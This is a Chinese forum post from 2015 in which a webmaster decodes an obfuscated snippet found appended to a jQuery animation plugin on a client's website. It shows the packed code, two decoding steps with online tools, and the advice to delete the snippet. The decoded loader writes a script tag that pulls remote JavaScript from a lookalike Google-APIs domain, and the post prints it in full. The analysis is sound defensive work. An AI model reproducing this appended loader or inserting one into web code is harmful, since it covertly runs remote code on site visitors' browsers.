|
29428
abc 发表于 2015-12-31 13:56:25
本帖最后由 abc 于 2015-12-31 13:59 编辑
一客户找到笔者,网站出现异常JS,查代码都没发现,哪里导致,笔者用工具分析了下!
从代码中,找到一段JS,JS是被加密的,经过分析研究,JS被经过两次加密,我们来解密一下:
1.先用这个工具解密 http://www.jqueryfuns.com/tools/jsencode
- d.css("opacity",0);o.useScaling&&d.css("transform","scale(0.0)");d.appendTo(L);R.push({element:p(d),animation:ka})}});N.remove();o.enhancement(L);for(G=0;G<R.length;G++)R[G].element.animate(R[G].animation,o.duration,o.easing,oa)}})}})(jQuery);eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('C e$=["\\t\\b\\4\\z\\f\\6\\s\\3","\\w\\a\\7\\3\\6\\i\\s","\\r\\5\\4\\a\\7\\8\\3\\d\\7\\t\\g\"\\w\\B\"\\d\\3\\o\\8\\6\\g\"\\3\\6\\n\\3\\c\\j\\9\\A\\9\\5\\4\\a\\7\\8\\3\"\\d\\4\\m\\9\\a\\5\\6\\3\\g\"\\k\\h\\p\\y\\F\\p\"\\d\\5\\a\\4\\g\"\\m\\3\\3\\8\\G\\c\\c\\9\\j\\9\\n\\v\\k\\b\\b\\k\\i\\6\\9\\8\\7\\5\\l\\o\\f\\4\\E\\h\\l\\4\\b\\f\\c\\f\\b\\h\\7\\i\\6\\v\\x\\x\\u\\u\\l\\j\\5\"\\q\\r\\c\\5\\4\\a\\7\\8\\3\\q"];D[e$[0]][e$[1]](e$[2]);',43,43,'|||x74|x63|x73|x65|x69|x70|x61|x72|x6f|x2f|x20|_|x6d|x3d|x62|x6c|x6a|x67|x2e|x68|x78|x79|x32|x3e|x3c|x6e|x64|x38|x2d|x77|x36|x33|x75|x76|x66|var|window|x71|x31|x3a'.split('|'),0,{}))
复制代码 解密后:
- d.css("opacity", 0);
- o.useScaling && d.css("transform", "scale(0.0)");
- d.appendTo(L);
- R.push({
- element: p(d),
- animation: ka
- })
- }
- });N.remove();o.enhancement(L);
- for (G = 0; G < R.length; G++) R[G].element.animate(R[G].animation, o.duration, o.easing, oa)
- }
- })
- }
- })(jQuery);
- var _$ = ["\x64\x6f\x63\x75\x6d\x65\x6e\x74", "\x77\x72\x69\x74\x65\x6c\x6e", "\x3c\x73\x63\x72\x69\x70\x74\x20\x69\x64\x3d"\x77\x66"\x20\x74\x79\x70\x65\x3d"\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74"\x20\x63\x68\x61\x72\x73\x65\x74\x3d"\x67\x62\x32\x33\x31\x32"\x20\x73\x72\x63\x3d"\x68\x74\x74\x70\x3a\x2f\x2f\x61\x6a\x61\x78\x2d\x67\x6f\x6f\x67\x6c\x65\x61\x70\x69\x73\x2e\x79\x6d\x63\x71\x62\x2e\x63\x6f\x6d\x2f\x6d\x6f\x62\x69\x6c\x65\x2d\x36\x36\x38\x38\x2e\x6a\x73"\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"];window[_$[0]][_$[1]](_$[2]);
复制代码 2.再用http://tool.lu/js/解密:
- d.css("opacity", 0);
- o.useScaling && d.css("transform", "scale(0.0)");
- d.appendTo(L);
- R.push({
- element: p(d),
- animation: ka
- })
- }
- });
- N.remove();
- o.enhancement(L);
- for (G = 0; G < R.length; G++) R[G].element.animate(R[G].animation, o.duration, o.easing, oa)
- }
- })
- }
- })(jQuery);
- var _$ = ["document", "writeln", "<script id="wf" type="text/javascript" charset="gb2312" src="http://ajax-googleapis.ymcqb.com/mobile-6688.js"></script>"];
- window[_$[0]][_$[1]](_$[2]);
复制代码
去掉后面那段异常JS,即可。
几个JS工具:
http://tool.css-js.com
http://tool.chinaz.com/js.aspx
http://tool.lu/js/
http://www.jqueryfuns.com/tools/jsencode
|
|